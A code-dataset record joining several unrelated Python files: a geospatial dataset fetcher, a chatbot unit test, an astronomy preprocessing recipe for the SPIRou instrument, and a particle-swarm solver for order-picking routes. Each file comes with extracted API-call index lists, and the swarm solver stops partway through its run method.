[((387, 480), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (403, 480), False, 'from django.db import migrations, models\n'), ((506, 536), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(4)'}), '(max_length=4)\n', (522, 536), False, 'from django.db import migrations, models\n'), ((564, 619), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (584, 619), False, 'from django.db import migrations, models\n'), ((657, 750), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""panel.MonitorObject"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'panel.MonitorObject')\n", (674, 750), False, 'from django.db import migrations, models\n')]
|
import os
import importlib
import pooch
from pooch import Unzip
from ._spooch import SPATIALPOOCH as _GOODBOY
###########################################################################
# Output formats this package can return, keyed by format name.
# Each optional format is flipped to True below if its package is importable.
allowed_formats = {
    "pandas" : False,
    "numpy" : False,
    "string" : True,
    "sedf" : False,
    # BUG FIX: initialize 'arcgis' so lookups (e.g. allowed_formats['arcgis']
    # in _fetch) do not raise KeyError when the arcgis package is absent.
    "arcgis" : False
}
###########################################################################
if importlib.util.find_spec('numpy') is not None:
    import numpy as np
    allowed_formats['numpy'] = True
if importlib.util.find_spec('pandas') is not None:
    import pandas as pd
    allowed_formats['pandas'] = True
if importlib.util.find_spec('arcgis') is not None:
    from arcgis.features import GeoAccessor, GeoSeriesAccessor
    allowed_formats['arcgis'] = True
###########################################################################
#--------------------------------------------------------------------------
def _fetch(data, f, **kwargs):
    """
    Fetch (and unzip) a dataset and return it in the requested format.

    :param data: registry path of the zip archive to fetch.
    :param f: output format; None or 'string' returns the extracted file
        paths, 'arcgis' returns a spatially enabled DataFrame when the
        arcgis package is available.
    :param kwargs: may contain 'dataset', the feature-class name inside a
        file geodatabase (.gdb).
    :return: list of extracted file paths, or a DataFrame for 'arcgis'.
    """
    files = _GOODBOY.fetch(fname=data, processor=Unzip())
    fmt = 'string' if f is None else str(f)
    if fmt == 'string':
        return files
    # .get() so a missing 'arcgis' key (package not installed) cannot raise
    if fmt == 'arcgis' and allowed_formats.get('arcgis', False):
        # loop variable renamed: the original shadowed the format argument `f`
        for path in files:
            if str(path).lower().endswith(".shp"):
                return pd.DataFrame.spatial.from_featureclass(path)
            elif str(path).lower().endswith('.gdb') and 'dataset' in kwargs:
                fc = os.path.join(path, kwargs['dataset'])
                # BUG FIX: previously passed the .gdb folder instead of the
                # joined feature-class path `fc`
                return pd.DataFrame.spatial.from_featureclass(fc)
    return files
#--------------------------------------------------------------------------
def fetch_beach_access_data(f=None):
    """Fetch the Public Access Information dataset in the requested format."""
    return _fetch(data="vector/Public_Access_Information.zip", f=f)
#--------------------------------------------------------------------------
def fetch_shipping_lanes_data(f=None):
    """Fetch the Shipping Lanes dataset in the requested format."""
    shipping = _fetch(data="vector/Shipping_Lanes.zip", f=f)
    return shipping
#--------------------------------------------------------------------------
def fetch_crime_shp_data(f=None):
    """Fetch the Crime shapefile dataset in the requested format."""
    crime = _fetch(data="vector/Crime.zip", f=f)
    return crime
#--------------------------------------------------------------------------
def fetch_family_resource_centers_data(f=None):
    """Fetch the Family Resource Centers dataset in the requested format."""
    return _fetch(data="vector/Family_Resource_Centers.zip", f=f)
|
[
"importlib.util.find_spec",
"pandas.DataFrame.spatial.from_featureclass",
"pooch.Unzip",
"os.path.join"
] |
[((373, 406), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""numpy"""'], {}), "('numpy')\n", (397, 406), False, 'import importlib\n'), ((482, 516), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""pandas"""'], {}), "('pandas')\n", (506, 516), False, 'import importlib\n'), ((594, 628), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""arcgis"""'], {}), "('arcgis')\n", (618, 628), False, 'import importlib\n'), ((1018, 1025), 'pooch.Unzip', 'Unzip', ([], {}), '()\n', (1023, 1025), False, 'from pooch import Unzip\n'), ((1266, 1307), 'pandas.DataFrame.spatial.from_featureclass', 'pd.DataFrame.spatial.from_featureclass', (['f'], {}), '(f)\n', (1304, 1307), True, 'import pandas as pd\n'), ((1403, 1437), 'os.path.join', 'os.path.join', (['f', "kwargs['dataset']"], {}), "(f, kwargs['dataset'])\n", (1415, 1437), False, 'import os\n'), ((1461, 1502), 'pandas.DataFrame.spatial.from_featureclass', 'pd.DataFrame.spatial.from_featureclass', (['f'], {}), '(f)\n', (1499, 1502), True, 'import pandas as pd\n')]
|
import sys
import os
import unittest
from botstory.botclass import BotClass
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
class TestChatbot(unittest.TestCase):
    """Unit tests for the BotClass chatbot."""

    def test_chatbot(self):
        """The bot should reply politely to thanks, regardless of case."""
        bot = BotClass()
        expected = "You're welcome."
        # phrases from conversations.json that must map to the same reply
        for phrase in ("Thank you.", "thank you"):
            self.assertEqual(bot.process_query(phrase), expected)
|
[
"os.path.dirname",
"botstory.botclass.BotClass"
] |
[((245, 255), 'botstory.botclass.BotClass', 'BotClass', ([], {}), '()\n', (253, 255), False, 'from botstory.botclass import BotClass\n'), ((125, 150), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (140, 150), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# CODE DESCRIPTION HERE
Created on 2019-03-05 16:38
@author: ncook
Version 0.0.1
"""
import numpy as np
import os
from apero import core
from apero import lang
from apero.core import constants
from apero.science import preprocessing as pp
from apero.io import drs_image
from apero.io import drs_fits
from apero.core.instruments.spirou import file_definitions
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'cal_preprocess_spirou.py'
__INSTRUMENT__ = 'SPIROU'
# Get constants (loads the instrument parameter dictionary)
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# Get Logging function
WLOG = core.wlog
# Get the text types (language-database entries used in log messages)
TextEntry = lang.drs_text.TextEntry
# Raw prefix (taken from the instrument's file definitions)
RAW_PREFIX = file_definitions.raw_prefix
# =============================================================================
# Define functions
# =============================================================================
# All recipe code goes in _main
# Only change the following from here:
# 1) function calls (i.e. main(arg1, arg2, **kwargs)
# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)
# 3) config_main outputs value (i.e. None, pp, reduced)
# Everything else is controlled from recipe_definition
def main(directory=None, files=None, **kwargs):
    """
    Main function for cal_preprocess_spirou.py

    :param directory: string, the night name sub-directory
    :param files: list of strings or string, the list of files to process
    :param kwargs: any additional keywords

    :type directory: str
    :type files: list[str]

    :keyword debug: int, debug level (0 for None)

    :returns: dictionary of the local space
    :rtype: dict
    """
    # collect the function-call arguments (positional must be named here)
    fkwargs = dict(directory=directory, files=files, **kwargs)
    # handle command-line inputs / function-call inputs
    recipe, params = core.setup(__NAME__, __INSTRUMENT__, fkwargs)
    # solid debug mode: stop right after setup
    if kwargs.get('DEBUG0000', False):
        return recipe, params
    # run the main bulk of code (catching all errors)
    llmain, success = core.run(__main__, recipe, params)
    # end message and return
    return core.end_main(params, llmain, recipe, success, outputs='None')
def __main__(recipe, params):
    """
    Body of the preprocessing recipe (executed via core.run from main()).

    For every input file: fix the header, identify its DRS type, check for
    corruption / pixel shifts (rolling the image back if shifted), apply
    detector corrections (top/bottom reference pixels, dark-amplifier median
    filter, 1/f noise), rotate to the expected orientation and write the
    preprocessed output file.

    :param recipe: the recipe instance (provides log, outputs, indexing)
    :param params: the constants/parameter dictionary
    :return: the local namespace (via core.return_locals)
    """
    # ----------------------------------------------------------------------
    # Main Code
    # ----------------------------------------------------------------------
    # Get hot pixels for corruption check
    hotpixels = pp.get_hot_pixels(params)
    # get skip parameter (whether already-preprocessed files are skipped)
    skip = params['SKIP_DONE_PP']
    # ----------------------------------------------------------------------
    # Loop around input files
    # ----------------------------------------------------------------------
    # get files
    infiles = params['INPUTS']['FILES'][1]
    # Number of files
    num_files = len(params['INPUTS']['FILES'][1])
    # storage for output files
    output_names = []
    # loop around number of files
    for it in range(num_files):
        # ------------------------------------------------------------------
        # add level to recipe log
        log1 = recipe.log.add_level(params, 'num', it)
        # ------------------------------------------------------------------
        # print file iteration progress
        core.file_processing_update(params, it, num_files)
        # get this iteration's file
        file_instance = infiles[it]
        # ------------------------------------------------------------------
        # Fix the spirou header
        # ------------------------------------------------------------------
        # certain keys may not be in some spirou files
        file_instance = drs_fits.fix_header(params, recipe, file_instance)
        # ------------------------------------------------------------------
        # identification of file drs type
        # ------------------------------------------------------------------
        # identify this iteration's file type
        cond, infile = pp.drs_infile_id(params, recipe, file_instance)
        # ------------------------------------------------------------------
        # if it wasn't found skip this file, if it was print a message
        if cond:
            eargs = [infile.name]
            WLOG(params, 'info', TextEntry('40-010-00001', args=eargs))
        else:
            eargs = [infile.filename]
            WLOG(params, 'info', TextEntry('40-010-00002', args=eargs))
            continue
        # get data from file instance
        image = np.array(infile.data)
        # ------------------------------------------------------------------
        # Get out file and check skip
        # ------------------------------------------------------------------
        # get the output drs file
        oargs = [params, recipe, infile, recipe.outputs['PP_FILE'], RAW_PREFIX]
        found, outfile = pp.drs_outfile_id(*oargs)
        # construct out filename
        outfile.construct_filename(params, infile=infile)
        # if we didn't find the output file we should log this error
        if not found:
            eargs = [outfile.name]
            WLOG(params, 'error', TextEntry('00-010-00003', args=eargs))
        # skip files whose output already exists (when SKIP_DONE_PP is set)
        if skip:
            if os.path.exists(outfile.filename):
                wargs = [infile.filename]
                WLOG(params, 'info', TextEntry('40-010-00012', args=wargs))
                continue
        # ----------------------------------------------------------------------
        # Check for pixel shift and/or corrupted files
        # ----------------------------------------------------------------------
        # storage
        snr_hotpix, rms_list = [], []
        # do this iteratively: if there is a shift we need to re-work-out QC
        for iteration in range(2):
            # get pass condition
            cout = pp.test_for_corrupt_files(params, image, hotpixels)
            snr_hotpix, rms_list = cout[0], cout[1]
            shiftdx, shiftdy = cout[2], cout[3]
            # use dx/dy to shift the image back to where the engineering flat
            #   is located
            if shiftdx != 0 or shiftdy != 0:
                # log process
                wmsg = TextEntry('40-010-00013', args=[shiftdx, shiftdy])
                WLOG(params, '', wmsg)
                # shift image
                image = np.roll(image, [shiftdy], axis=0)
                image = np.roll(image, [shiftdx], axis=1)
            # work out QC here
            qargs = [snr_hotpix, infile, rms_list]
            qc_params, passed = pp.quality_control(params, *qargs, log=False)
            # if passed break
            if passed:
                break
        # ------------------------------------------------------------------
        # Quality control to check for corrupt files
        # ------------------------------------------------------------------
        # re-calculate qc (this time logging the outcome)
        qargs = [snr_hotpix, infile, rms_list]
        qc_params, passed = pp.quality_control(params, *qargs, log=True)
        # update recipe log
        log1.add_qc(params, qc_params, passed)
        if not passed:
            # end log here
            log1.end(params)
            # go to next iteration
            continue
        # ------------------------------------------------------------------
        # correct image
        # ------------------------------------------------------------------
        # correct for the top and bottom reference pixels
        WLOG(params, '', TextEntry('40-010-00003'))
        image = pp.correct_top_bottom(params, image)
        # correct by a median filter from the dark amplifiers
        WLOG(params, '', TextEntry('40-010-00004'))
        image = pp.median_filter_dark_amps(params, image)
        # correct for the 1/f noise
        WLOG(params, '', TextEntry('40-010-00005'))
        image = pp.median_one_over_f_noise(params, image)
        # ------------------------------------------------------------------
        # calculate mid observation time
        # ------------------------------------------------------------------
        mout = drs_fits.get_mid_obs_time(params, infile.header)
        mid_obs_time, mid_obs_method = mout
        # ------------------------------------------------------------------
        # rotate image
        # ------------------------------------------------------------------
        # rotation to match HARPS orientation (expected by DRS)
        image = drs_image.rotate_image(image, params['RAW_TO_PP_ROTATION'])
        # ------------------------------------------------------------------
        # Save rotated image
        # ------------------------------------------------------------------
        # define header keys for output file
        # copy keys from input file
        outfile.copy_original_keys(infile)
        # add version
        outfile.add_hkey('KW_PPVERSION', value=params['DRS_VERSION'])
        # add dates
        outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])
        outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])
        # add process id
        outfile.add_hkey('KW_PID', value=params['PID'])
        # add input filename
        outfile.add_hkey_1d('KW_INFILE1', values=[infile.basename],
                            dim1name='infile')
        # add qc parameters
        outfile.add_qckeys(qc_params)
        # add dprtype
        outfile.add_hkey('KW_DPRTYPE', value=outfile.name)
        # add the shift that was used to correct the image
        # (shiftdx/shiftdy carry the values from the last corruption-check pass)
        outfile.add_hkey('KW_PPSHIFTX', value=shiftdx)
        outfile.add_hkey('KW_PPSHIFTY', value=shiftdy)
        # add mid observation time
        outfile.add_hkey('KW_MID_OBS_TIME', value=mid_obs_time.mjd)
        outfile.add_hkey('KW_MID_OBSTIME_METHOD', value=mid_obs_method)
        # ------------------------------------------------------------------
        # copy data
        outfile.data = image
        # ------------------------------------------------------------------
        # log that we are saving rotated image
        wargs = [outfile.filename]
        WLOG(params, '', TextEntry('40-010-00009', args=wargs))
        # ------------------------------------------------------------------
        # write fits image to file
        outfile.write_file()
        # add to output files (for indexing)
        recipe.add_output_file(outfile)
        # index this file
        core.end_main(params, None, recipe, success=True, outputs='pp',
                      end=False)
        # ------------------------------------------------------------------
        # append to output storage in p
        # ------------------------------------------------------------------
        output_names.append(outfile.filename)
        # ------------------------------------------------------------------
        # update recipe log file
        # ------------------------------------------------------------------
        log1.end(params)
    # ----------------------------------------------------------------------
    # End of main code
    # ----------------------------------------------------------------------
    return core.return_locals(params, dict(locals()))
# =============================================================================
# Start of code
# =============================================================================
if __name__ == "__main__":
    # run main with no arguments (get from command line - sys.argv)
    ll = main()
# =============================================================================
# End of code
# =============================================================================
|
[
"apero.core.setup",
"apero.science.preprocessing.median_one_over_f_noise",
"apero.science.preprocessing.correct_top_bottom",
"apero.core.run",
"apero.science.preprocessing.quality_control",
"apero.science.preprocessing.get_hot_pixels",
"apero.io.drs_image.rotate_image",
"os.path.exists",
"apero.io.drs_fits.fix_header",
"apero.core.file_processing_update",
"apero.science.preprocessing.median_filter_dark_amps",
"numpy.roll",
"apero.science.preprocessing.drs_infile_id",
"apero.core.constants.load",
"apero.io.drs_fits.get_mid_obs_time",
"apero.science.preprocessing.test_for_corrupt_files",
"apero.science.preprocessing.drs_outfile_id",
"apero.core.end_main",
"numpy.array"
] |
[((686, 716), 'apero.core.constants.load', 'constants.load', (['__INSTRUMENT__'], {}), '(__INSTRUMENT__)\n', (700, 716), False, 'from apero.core import constants\n'), ((2269, 2314), 'apero.core.setup', 'core.setup', (['__NAME__', '__INSTRUMENT__', 'fkwargs'], {}), '(__NAME__, __INSTRUMENT__, fkwargs)\n', (2279, 2314), False, 'from apero import core\n'), ((2563, 2597), 'apero.core.run', 'core.run', (['__main__', 'recipe', 'params'], {}), '(__main__, recipe, params)\n', (2571, 2597), False, 'from apero import core\n'), ((2781, 2843), 'apero.core.end_main', 'core.end_main', (['params', 'llmain', 'recipe', 'success'], {'outputs': '"""None"""'}), "(params, llmain, recipe, success, outputs='None')\n", (2794, 2843), False, 'from apero import core\n'), ((3105, 3130), 'apero.science.preprocessing.get_hot_pixels', 'pp.get_hot_pixels', (['params'], {}), '(params)\n', (3122, 3130), True, 'from apero.science import preprocessing as pp\n'), ((3917, 3967), 'apero.core.file_processing_update', 'core.file_processing_update', (['params', 'it', 'num_files'], {}), '(params, it, num_files)\n', (3944, 3967), False, 'from apero import core\n'), ((4303, 4353), 'apero.io.drs_fits.fix_header', 'drs_fits.fix_header', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4322, 4353), False, 'from apero.io import drs_fits\n'), ((4618, 4665), 'apero.science.preprocessing.drs_infile_id', 'pp.drs_infile_id', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4634, 4665), True, 'from apero.science import preprocessing as pp\n'), ((5136, 5157), 'numpy.array', 'np.array', (['infile.data'], {}), '(infile.data)\n', (5144, 5157), True, 'import numpy as np\n'), ((5490, 5515), 'apero.science.preprocessing.drs_outfile_id', 'pp.drs_outfile_id', (['*oargs'], {}), '(*oargs)\n', (5507, 5515), True, 'from apero.science import preprocessing as pp\n'), ((7587, 7631), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', 
'*qargs'], {'log': '(True)'}), '(params, *qargs, log=True)\n', (7605, 7631), True, 'from apero.science import preprocessing as pp\n'), ((8147, 8183), 'apero.science.preprocessing.correct_top_bottom', 'pp.correct_top_bottom', (['params', 'image'], {}), '(params, image)\n', (8168, 8183), True, 'from apero.science import preprocessing as pp\n'), ((8315, 8356), 'apero.science.preprocessing.median_filter_dark_amps', 'pp.median_filter_dark_amps', (['params', 'image'], {}), '(params, image)\n', (8341, 8356), True, 'from apero.science import preprocessing as pp\n'), ((8462, 8503), 'apero.science.preprocessing.median_one_over_f_noise', 'pp.median_one_over_f_noise', (['params', 'image'], {}), '(params, image)\n', (8488, 8503), True, 'from apero.science import preprocessing as pp\n'), ((8715, 8763), 'apero.io.drs_fits.get_mid_obs_time', 'drs_fits.get_mid_obs_time', (['params', 'infile.header'], {}), '(params, infile.header)\n', (8740, 8763), False, 'from apero.io import drs_fits\n'), ((9066, 9125), 'apero.io.drs_image.rotate_image', 'drs_image.rotate_image', (['image', "params['RAW_TO_PP_ROTATION']"], {}), "(image, params['RAW_TO_PP_ROTATION'])\n", (9088, 9125), False, 'from apero.io import drs_image\n'), ((11006, 11080), 'apero.core.end_main', 'core.end_main', (['params', 'None', 'recipe'], {'success': '(True)', 'outputs': '"""pp"""', 'end': '(False)'}), "(params, None, recipe, success=True, outputs='pp', end=False)\n", (11019, 11080), False, 'from apero import core\n'), ((5838, 5870), 'os.path.exists', 'os.path.exists', (['outfile.filename'], {}), '(outfile.filename)\n', (5852, 5870), False, 'import os\n'), ((6451, 6502), 'apero.science.preprocessing.test_for_corrupt_files', 'pp.test_for_corrupt_files', (['params', 'image', 'hotpixels'], {}), '(params, image, hotpixels)\n', (6476, 6502), True, 'from apero.science import preprocessing as pp\n'), ((7157, 7202), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(False)'}), 
'(params, *qargs, log=False)\n', (7175, 7202), True, 'from apero.science import preprocessing as pp\n'), ((6951, 6984), 'numpy.roll', 'np.roll', (['image', '[shiftdy]'], {'axis': '(0)'}), '(image, [shiftdy], axis=0)\n', (6958, 6984), True, 'import numpy as np\n'), ((7009, 7042), 'numpy.roll', 'np.roll', (['image', '[shiftdx]'], {'axis': '(1)'}), '(image, [shiftdx], axis=1)\n', (7016, 7042), True, 'import numpy as np\n')]
|
from typing import Dict, List, Tuple, Union, Callable, Set, cast
import random
import math
import time
def _bra (lst : List[int], beta : float = 0.3) -> int:
"""
The estraction of an item from a list, by using a biased randomisation based
on a quasi-geometric distribution (i.e. f(x) = (1-beta)^x).
:param beta: The parameter of the quasi-geometric.
:return: The estracted element.
"""
return lst[int(math.log(random.random(), 1 - beta)) % len(lst)]
def _triangular (lst : List[int]) -> int:
"""
The estraction of an item from a list, by using a triangular distribution.
:return: The estracted element.
"""
return lst[int(len(lst) - len(lst)*random.random()/2) % len(lst)]
def _make_negative_exp (max_iter : int = 1000, max_v : float = 1.0, min_v : float = 0.5) -> Callable[[int],float]:
"""
This method generates an exponential function used to increase the weight
given to the current position of the particle.
As the number of iterations increase, the particles get more and more static.
***Note*** : Lower is the value of the weight, grater is the relevance given to
the current position of the particles. Hence, for a low weight, the particles are
more static. As the number of iterations without improvement increases, the
mobility of the particles increases too.
:param max_iter: The maximum number of iterations
:param max_v: The maximum value the weight of the current position must assume
:param min_v: The minimum value the weight of the current position must assume
:return: A callable function which represents the exponential needed.
def negative_exp (x : int) -> float
:param x: The current iteration without improvement.
:return: The weight of the current position of the particles.
"""
alpha = math.log(max_v + min_v)/max_iter
def negative_exp (x : int) -> float:
return math.exp(alpha * x) - min_v
return negative_exp
def _negative_exp (x : int, alpha : float) -> float:
"""
This method return the negative exponential according to equation
f(x) = e^(-alpha*x)
:param x: The input.
:param alpha: The parameter of the exponential (the higher is alpha, the
faster is the decrease).
:return: The output f(x).
"""
return math.exp(-alpha*x)
def _compute_distance (lst : List[int], distances : List[List[int]]) -> int:
"""
Given a picking list and a distance matrix, this method calculates the
distance ran to complete the picking list.
:param lst: The picking list
:param distances: The distance matrix
:return: The distance ran.
"""
return sum(distances[lst[i]][lst[i+1]] for i in range(len(lst) - 1)) + distances[lst[-1]][0] + distances[0][lst[0]]
def _two_opt (lst : List[int], i : int, j : int) -> List[int]:
"""
This method, given two cutting positions i and j, makes a 2-Opt on the
starting list.
:param lst: The starting list.
:param i: First cutting point.
:param j: Second cutting point.
:return: The new list.
"""
return lst[:min(i,j)] + list(reversed(lst[min(i,j):max(i,j)])) + lst[max(i,j):]
def _greedy (lst : List[int], distances : List[List[int]]) -> List[int]:
"""
This method returns a purely greedy solution.
:param lst: The list of nodes to visit.
:param distances: The distance matrix.
:return: The nodes in the order in which they should be visited.
"""
c_node = 0; sol : List[int] = []; options = list(lst)
while len(options) > 0:
options = sorted(options, key=lambda i: distances[c_node][i])
c_node = options.pop(0)
sol.append (c_node)
return sol
class Particle (object):
    """
    An instance of this class represents a particle used in this algorithm.

    Each particle keeps four reference solutions -- current, intention
    (a random sequence), personal best and the greedy tour -- and builds a
    new tour node-by-node by probabilistically following one of them.
    """
    def __init__(self, *,
                 distances : Dict[int, Dict[int,int]],
                 picking_list : List[int],
                 paths : Dict[int,Dict[int, Set[int]]],
                 greediness : float = 0.1,
                 beta : float = 0.7,
                 check_paths : float = 0.1,
                 deepsearch : float = 0.05,
                 fulldeepsearch : float = 0.5,
                 max_depth : int = 2500,
                 ) -> None:
        '''
        :param distances: The distance matrix
        :param picking_list: The picking list.
        :param paths: The nodes in between two others
        :param greediness: The importance given to the greedy solution. To the random intention is given a weigth
                            equal to (1 - alpha).
        :param beta: The parameter of the geometric.
        :param check_paths: The probability to include the nodes between node i and j, when going from i to j.
        :param deepsearch: Probability to do deep search.
        :param fulldeepsearch: Probability to do full deep search.
        :param max_depth: Maximum number of iteration in case of deep search
        :attr current: The current solution.
        :attr intention: The current intention.
        :attr pbest: The current personal best found do far.
        :attr vcurrent: The cost of the current.
        :attr vintention: The cost of the intention.
        :attr vpbest: The cost of the personal best.
        :attr greedy: The greedy solution.
        :attr vgreedy: The cost of the greedy solution.
        :attr explorations: The number of solutons explored up to now.
        '''
        # set parameters
        self.distances = dict(distances)
        self.picking_list = list(picking_list)
        self.paths = dict(paths)
        self.greediness = greediness
        self.beta = beta
        self.check_paths = check_paths
        self.deepsearch = deepsearch
        self.fulldeepsearch = fulldeepsearch
        self.max_depth = max_depth
        # starting solutions
        self.current = list(picking_list)
        random.shuffle(self.current)
        self.pbest = list(self.current)
        self.intention = list(self.current)
        random.shuffle(self.intention)
        # evaluate solutions (i.e., distances)
        # vpbest starts at +inf so the first update_dist() call adopts the
        # shuffled starting solution as personal best (the cast only satisfies
        # the int annotation).
        self.vpbest, self.vcurrent, self.vintention = cast(int,float("inf")), 0, 0
        self.update_dist ()
        # greedy solution
        self.greedy = _greedy (picking_list, distances)
        self.vgreedy = _compute_distance (self.greedy, distances)
        # The number of solutions explored
        self.explorations : int = 0
    def update_dist (self) -> None:
        """
        This method updates the cost of the solutions kept in memory, i.e. current, intention, and pbest.
        """
        self.vcurrent, self.vintention = 0, 0
        # Legs between consecutive nodes of each tour.
        for i in range(len(self.picking_list) - 1):
            self.vcurrent += self.distances[self.current[i]][self.current[i+1]]
            self.vintention += self.distances[self.intention[i]][self.intention[i+1]]
        # Depot (node 0) to first node, and last node back to depot.
        self.vcurrent += self.distances[0][self.current[0]]
        self.vintention += self.distances[0][self.intention[0]]
        self.vcurrent += self.distances[self.current[-1]][0]
        self.vintention += self.distances[self.intention[-1]][0]
        if self.vcurrent < self.vpbest:
            self.vpbest, self.pbest = self.vcurrent, list(self.current)
    def move (self, gbest : List[int], vgbest : int) -> Tuple[List[int], int]:
        """
        This method represents the movement of the particle that explores a new solution.
        :param gbest: The global best of the whole swarm.
        :param vgbest: The cost of the gbest.
        :return: the personal best and its cost.
        """
        # Reset the current -> !!! To remove if we want to consider it in the
        # construction process.
        self.current = []
        # Initialize variables used in the construction process
        nodes : Set[int] = set(self.picking_list)
        c_node : int = 0
        n_node : int
        options : List[Tuple[int,float]]
        # Construct node-by-node a new solution
        while len(nodes) > 0:
            options = []
            if c_node == 0:
                # From the depot: candidates are the first node of each
                # reference solution, each with its weight.
                options = [(self.intention[0], 1.0 - self.greediness),
                           (self.greedy[0], self.greediness),
                           (self.pbest[0], 1.0),
                           (gbest[0], 1.0)
                           ]
            else:
                # Candidates are the successors of c_node in each reference
                # solution, kept only if still unvisited.
                options = [(sol[sol.index(c_node) + 1], w)
                           for sol, w in ((self.intention, 1.0 - self.greediness), (self.greedy, self.greediness),(self.pbest, 1.0), (gbest, 1.0))
                           if sol.index(c_node) != len(sol) - 1 and sol[sol.index(c_node) + 1] in nodes]
            if len(options) == 0:
                n_node = random.choice(list(nodes))
            elif len (options) == 1:
                n_node = options[0][0]
            else:
                # Rank candidates by distance divided by weight (higher weight
                # => more attractive) and extract one via biased randomisation.
                n_node = _bra (sorted(options, key=lambda i: self.distances[c_node][i[0]]/i[1]), self.beta)[0]
            nodes.remove (n_node)
            # Eventually include before the new node the nodes on the shortest path
            # between the last visited node and the new one.
            r = random.random()
            if r < self.check_paths:
                in_middle = [i for i in nodes if i in self.paths[c_node][n_node]]
                while len(in_middle) > 0:
                    # Visit the intermediate nodes in nearest-first order.
                    in_middle = sorted (in_middle, key=lambda i: self.distances[c_node][i])
                    c_node = in_middle.pop(0)
                    self.current.append (c_node)
                    nodes.remove (c_node)
            # Add the new node to the solution
            self.current.append (n_node)
            c_node = n_node
        # Update the number of solutions explored
        self.explorations += 1
        # Shuffle the intention
        random.shuffle(self.intention)
        # Update the personal best if needed, the cost of the current
        # and the cost of the new intention
        self.update_dist ()
        # Eventually do a deepsearch
        r = random.random()
        if len(self.picking_list) > 3 and r < self.deepsearch:
            r2 = random.random ()
            if r2 < self.fulldeepsearch:
                self.deep_search(list(self.current), full=True)
            else:
                self.deep_search(list(self.current), full=False)
        if self.vcurrent < self.vpbest:
            self.pbest, self.vpbest = list(self.current), self.vcurrent
        return self.pbest, self.vpbest
    def deep_search(self, lst : List[int], full : bool = False, starting_depth : int = 0) -> None:
        """
        This method does a deepsearch via 2-Opt in the neighbourhood of the
        current solution.
        :param lst: The picking list.
        :param full: If TRUE every time there is an improvement and the maximum depth has
                    not been reached the deepsearch goes on.
        :param starting_depth: Used in case of full == TRUE to control the depth.
        """
        # All candidate 2-Opt cuts (i, j) with j >= i + 2, tried in random order.
        edges = [(i,j) for i in range(0,len(lst)-2) for j in range(i+2,len(lst))]
        random.shuffle(edges)
        self.explorations += len(edges)
        for i, j in edges:
            sol = _two_opt (lst, i, j)
            cost = _compute_distance (sol, self.distances)
            if cost < self.vcurrent:
                # Improvement found: adopt it and, in full mode, recurse on
                # the improved tour (bounded by max_depth).
                self.current, self.vcurrent = list(sol), cost
                if full is True and starting_depth < self.max_depth:
                    starting_depth += 1
                    self.deep_search(sol, True, starting_depth)
class Mattia_PSO:
    """
    An instance of this class represents the Particle Swarm Optimization published by <NAME>,
    Zammori in 2021.
    An Hibrid PSO for TSP
    Solution is generated node by node
    selecting from four possibilities, namely: current solution, particle best, overall best
    and intention; the latter one is a random sequence.
    Say that the generated sequence is 1-3-4 and the alternative are:
    1-2-3-4-5; 5-4-3-2-1; 3-2-1-5-4; 5-4-1-2-3
    so "suggested nodes" are: (5, 3, nan, 1), since 3 is already in, (5,1) remain
    choice depends (in a probabilistic way on the corrected distance from 3 to 5 and to 1 to 5
    the less the better. Distance is corrected with weigth used to give more importance
    to the current solution, then to the best and so on.
    This is the basic generation scheme. Solution may be shaked (using a first level or
    deep level 2Opt Procedure)
    """
    def __init__ (self,*,
                  distances : Dict[int, Dict[int,int]],
                  picking_list : List[int],
                  paths : Dict[int, Dict[int, Set[int]]],
                  era : int = 10_000,
                  particles : int = 40,
                  max_noimp : int = 1000,
                  print_every : int = 100,
                  finalsearch : bool = True,
                  particle_data : Dict[str, Union[int, float, Callable[[int], float], Dict[str,float], Tuple[float,float], List[int], List[List[int]]]]
                  ) -> None:
        """
        Initialize.
        :param distances: The distance matrix.
        :param era: The number of iterations.
        :param particles: The number of particles.
        :param max_noimp: The maximum number of iterations with no getting any improvement.
        :param print_every: The number of iterations between a log and the next one.
        :attr history: The history of the best solutions found by the algorithm.
        :attr computations: The number of solutions explored before finding the best.
        """
        self.era = era
        self.max_noimp = max_noimp
        self.print_every = print_every
        self.finalsearch = finalsearch
        # NOTE: particle_data is mutated in place (the problem instance is
        # injected into it) and kept so that reset() can rebuild the swarm.
        particle_data["distances"] = distances
        particle_data["picking_list"] = picking_list
        particle_data["paths"] = paths
        self.particle_data = particle_data
        self.swarm : List[Particle] = [Particle(**particle_data) for _ in range(particles)]
        self.history : List[int]
        self.computations : int = 0
        self.computational_time : float = 0.0
    def reset(self):
        """Re-create the swarm (same size, same particle data) and clear the
        optimisation history."""
        particles = len(self.swarm)
        self.swarm = [Particle(**self.particle_data) for _ in range(particles)]
        self.history = []
        self.computations = 0
    def run (self, verbose : bool = False) -> Tuple[List[int], int]:
        """
        This is the method to execute the algorithm.
        It finally returns the best solution found and its cost.
        :param verbose: If True, log the best cost every print_every epochs.
        :return: gbest, vgbest
        """
        # Initialize starting time
